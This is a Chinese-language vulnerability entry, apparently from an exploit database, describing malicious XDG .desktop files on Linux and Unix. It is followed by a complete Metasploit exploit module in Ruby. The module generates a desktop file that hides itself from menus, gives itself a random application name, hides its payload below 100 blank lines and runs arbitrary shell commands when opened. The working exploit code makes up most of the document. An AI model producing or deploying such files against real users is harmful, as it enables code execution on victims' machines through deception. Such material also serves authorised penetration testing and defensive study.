Malicious XDG Desktop File

漏洞信息

漏洞名称： Malicious XDG Desktop File

漏洞类型： 文件上传

漏洞等级： 高危

漏洞描述： 该漏洞涉及恶意XDG桌面（.desktop）文件的创建与利用。XDG桌面文件是一种在Linux、Unix、Solaris和FreeBSD等操作系统中常见的桌面环境配置文件，用于定义应用程序的启动方式和显示属性。这类文件广泛应用于各种桌面环境，如GNOME、KDE等，是用户日常操作中不可或缺的一部分。

漏洞的技术根源在于，虽然大多数现代系统默认不信任桌面文件，并在运行此类文件时会向用户发出警告提示，但用户仍可能选择忽略警告并执行文件。此外，某些桌面环境的默认文件管理器应用程序可能会施加更严格的执行要求，如提示用户将文件设置为可执行和/或将文件标记为受信任，然后才能执行文件。这种设计上的灵活性被恶意利用，通过构造特定的.desktop文件，攻击者可以诱导用户执行恶意命令。

此漏洞的安全风险较高，因为它可能导致远程代码执行。攻击者可以通过诱骗用户打开恶意构造的.desktop文件，从而在用户系统上执行任意命令。这种攻击不需要用户进行复杂的交互，仅需用户忽略或绕过系统警告即可触发。由于.desktop文件在日常使用中较为常见，用户可能对这类文件的潜在风险缺乏足够的警惕性，增加了漏洞被成功利用的可能性。此外，该漏洞的利用不依赖于特定的认证机制，可以在用户不知情的情况下自动执行恶意代码，对系统安全构成严重威胁。

产品名称： XDG Desktop

来源： https://github.com/rapid7/metasploit-framework/blob/a7ab23d0839e90481bdaac16ffd41e27f0c502ba/modules%2Fexploits%2Fmulti%2Ffileformat%2Fxdg_desktop.rb

类型： rapid7/metasploit-framework:github issues

POC详情

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Malicious XDG Desktop File',
        'Description' => %q{
          This module creates a malicious XDG Desktop (.desktop) file.

          On most modern systems, desktop files are not trusted by default.
          The user will receive a warning prompt that the file is not trusted
          when running the file, but may choose to run the file anyway.

          The default file manager applications in some desktop environments
          may impose more strict execution requirements by prompting the user
          to set the file as executable and/or marking the file as trusted
          before the file can be executed.
        },
        'Author' => [
          'bcoles'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['ATT&CK', Mitre::Attack::Technique::T1204_002_MALICIOUS_FILE],
          ['URL', 'https://specifications.freedesktop.org/desktop-entry-spec/latest/'],
          ['URL', 'https://specifications.freedesktop.org/desktop-entry-spec/latest/exec-variables.html'],
          ['URL', 'https://wiki.archlinux.org/title/Desktop_entries']
        ],
        'Platform' => %w[linux unix solaris freebsd],
        'Arch' => [ARCH_CMD],
        'Targets' => [
          [ 'Automatic', {} ]
        ],
        'DefaultTarget' => 0,
        'Privileged' => false,
        'DisclosureDate' => '2007-02-06',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [SCREEN_EFFECTS]
        }
      )
    )

    register_options([
      OptString.new('FILENAME', [true, 'The desktop file name.', 'msf.desktop']),
      OptString.new('APPLICATION_NAME', [false, 'The application name. Some file managers will display this name instead of the file name. (default is random)', '']),
    ])

    register_advanced_options([
      OptInt.new('PrependNewLines', [false, 'Prepend new lines before the payload.', 100]),
    ])
  end

  def application_name
    datastore['APPLICATION_NAME'].blank? ? rand_text_alpha(6..12) : datastore['APPLICATION_NAME']
  end

  def exploit
    values = [
      'Type=Application',
      "Name=#{application_name}",
      # 'Hidden=true', # This property is not supported by old systems, which prevents execution
      'NoDisplay=true',
      'Terminal=false'
    ]
    desktop = "[Desktop Entry]\n"
    desktop << values.shuffle.join("\n")
    desktop << "\n"
    desktop << "\n" * datastore['PrependNewLines']

    escaped_payload = payload.encoded.gsub('\\', '\\\\\\').gsub('"', '\\"')
    desktop << "Exec=/bin/sh -c \"#{escaped_payload}\""

    file_create(desktop)
  end
end